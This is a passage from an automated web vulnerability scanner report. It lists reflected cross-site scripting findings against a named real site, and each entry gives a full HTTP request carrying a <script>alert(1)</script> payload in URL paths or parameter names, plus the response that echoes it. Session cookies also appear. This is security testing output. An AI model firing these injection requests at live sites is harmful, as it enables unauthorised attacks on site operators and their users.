...[SNIP]...

2.3549. http://www.resellerbase.com/detail/6/whitelabeldropshipper-com.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/6/whitelabeldropshipper-com.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b007c<script>alert(1)</script>ac43bd0e4fa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailb007c<script>alert(1)</script>ac43bd0e4fa/6/whitelabeldropshipper-com.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:24:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailb007c<script>alert(1)</script>ac43bd0e4fa/6/whitelabeldropshipper-com.html was not found on this server.</p>
...[SNIP]...

2.3550. http://www.resellerbase.com/detail/6/whitelabeldropshipper-com.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/6/whitelabeldropshipper-com.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 100a9<a>9e72415947f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/6100a9<a>9e72415947f/whitelabeldropshipper-com.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:24:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/6100a9<a>9e72415947f/whitelabeldropshipper-com.html was not found on this server.</p>
...[SNIP]...

2.3551. http://www.resellerbase.com/detail/6/whitelabeldropshipper-com.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/6/whitelabeldropshipper-com.html

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload d861e<script>alert(1)</script>c9644de2d6f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/6/d861e<script>alert(1)</script>c9644de2d6f HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:25:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/6/d861e<script>alert(1)</script>c9644de2d6f was not found on this server.</p>
...[SNIP]...

2.3552. http://www.resellerbase.com/detail/7/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/7/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 6681c<script>alert(1)</script>15208faa8b5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail6681c<script>alert(1)</script>15208faa8b5/7/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail6681c<script>alert(1)</script>15208faa8b5/7/ was not found on this server.</p>
...[SNIP]...

2.3553. http://www.resellerbase.com/detail/7/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/7/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f05ff<script>alert(1)</script>fc20ed9a0bc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/7f05ff<script>alert(1)</script>fc20ed9a0bc/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/7f05ff<script>alert(1)</script>fc20ed9a0bc/ was not found on this server.</p>
...[SNIP]...

2.3554. http://www.resellerbase.com/detail/7/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/7/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 9009b<script>alert(1)</script>c10e4e4edad was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/7/?9009b<script>alert(1)</script>c10e4e4edad=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/7/?9009b<script>alert(1)</script>c10e4e4edad=1 was not found on this server.</p>
...[SNIP]...

2.3555. http://www.resellerbase.com/detail/7/proxyonline-info-website-monitoring.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/7/proxyonline-info-website-monitoring.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9b77c<script>alert(1)</script>5bf95d27dc5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail9b77c<script>alert(1)</script>5bf95d27dc5/7/proxyonline-info-website-monitoring.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:26:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail9b77c<script>alert(1)</script>5bf95d27dc5/7/proxyonline-info-website-monitoring.html was not found on this server.</p>
...[SNIP]...

2.3556. http://www.resellerbase.com/detail/7/proxyonline-info-website-monitoring.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/7/proxyonline-info-website-monitoring.html

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 79aef<script>alert(1)</script>73455682fa8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/7/79aef<script>alert(1)</script>73455682fa8 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:27:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/7/79aef<script>alert(1)</script>73455682fa8 was not found on this server.</p>
...[SNIP]...

2.3557. http://www.resellerbase.com/detail/7/rating.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/7/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 552f6<script>alert(1)</script>85c0423554b4ad4fb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail552f6<script>alert(1)</script>85c0423554b4ad4fb/7/rating.php?id=7&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/7/proxyonline-info-website-monitoring.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail552f6<script>alert(1)</script>85c0423554b4ad4fb/7/rating.php?id=7&rating=5 was not found on this server.</p>
...[SNIP]...

2.3558. http://www.resellerbase.com/detail/7/rating.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/7/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 52e89<script>alert(1)</script>a907bbc4541 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail52e89<script>alert(1)</script>a907bbc4541/7/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:38:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail52e89<script>alert(1)</script>a907bbc4541/7/rating.php was not found on this server.</p>
...[SNIP]...

2.3559. http://www.resellerbase.com/detail/7/rating.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/7/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 16cda<script>alert(1)</script>fd0ebe62beaffd2fa was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/716cda<script>alert(1)</script>fd0ebe62beaffd2fa/rating.php?id=7&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/7/proxyonline-info-website-monitoring.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/716cda<script>alert(1)</script>fd0ebe62beaffd2fa/rating.php?id=7&rating=5 was not found on this server.</p>
...[SNIP]...

2.3560. http://www.resellerbase.com/detail/7/rating.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/7/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6356d<script>alert(1)</script>546a488a8aa was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/76356d<script>alert(1)</script>546a488a8aa/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:38:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/76356d<script>alert(1)</script>546a488a8aa/rating.php was not found on this server.</p>
...[SNIP]...

2.3561. http://www.resellerbase.com/detail/7/rating.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/7/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ee034<script>alert(1)</script>a66daae39e5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/7/rating.phpee034<script>alert(1)</script>a66daae39e5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:38:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/7/rating.phpee034<script>alert(1)</script>a66daae39e5 was not found on this server.</p>
...[SNIP]...

2.3562. http://www.resellerbase.com/detail/7/rating.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/7/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload e7a20<script>alert(1)</script>9d49c60f48b94467d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/7/rating.phpe7a20<script>alert(1)</script>9d49c60f48b94467d?id=7&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/7/proxyonline-info-website-monitoring.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/7/rating.phpe7a20<script>alert(1)</script>9d49c60f48b94467d?id=7&rating=5 was not found on this server.</p>
...[SNIP]...

2.3563. http://www.resellerbase.com/detail/7/rating.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/7/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e4077<script>alert(1)</script>c8802128fde was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/7/rating.php?e4077<script>alert(1)</script>c8802128fde=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:37:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/7/rating.php?e4077<script>alert(1)</script>c8802128fde=1 was not found on this server.</p>
...[SNIP]...

2.3564. http://www.resellerbase.com/detail/7/rating.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/7/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 4dcfe<script>alert(1)</script>ba751d9bf3623c175 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/7/rating.php/4dcfe<script>alert(1)</script>ba751d9bf3623c175?id=7&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/7/proxyonline-info-website-monitoring.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/7/rating.php/4dcfe<script>alert(1)</script>ba751d9bf3623c175?id=7&rating=5 was not found on this server.</p>
...[SNIP]...

2.3565. http://www.resellerbase.com/detail/7/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/7/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e8536<script>alert(1)</script>75160a3444a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaile8536<script>alert(1)</script>75160a3444a/7/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/7/proxyonline-info-website-monitoring.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaile8536<script>alert(1)</script>75160a3444a/7/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3566. http://www.resellerbase.com/detail/7/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/7/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 31508<script>alert(1)</script>6549f35cbc3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/731508<script>alert(1)</script>6549f35cbc3/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/7/proxyonline-info-website-monitoring.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/731508<script>alert(1)</script>6549f35cbc3/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3567. http://www.resellerbase.com/detail/7/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/7/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 84dbf<script>alert(1)</script>2810e6acca0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/7/search.php84dbf<script>alert(1)</script>2810e6acca0?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/7/proxyonline-info-website-monitoring.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/7/search.php84dbf<script>alert(1)</script>2810e6acca0?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3568. http://www.resellerbase.com/detail/7/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/7/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload cbbf7<a>10fddf5b5ce was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.
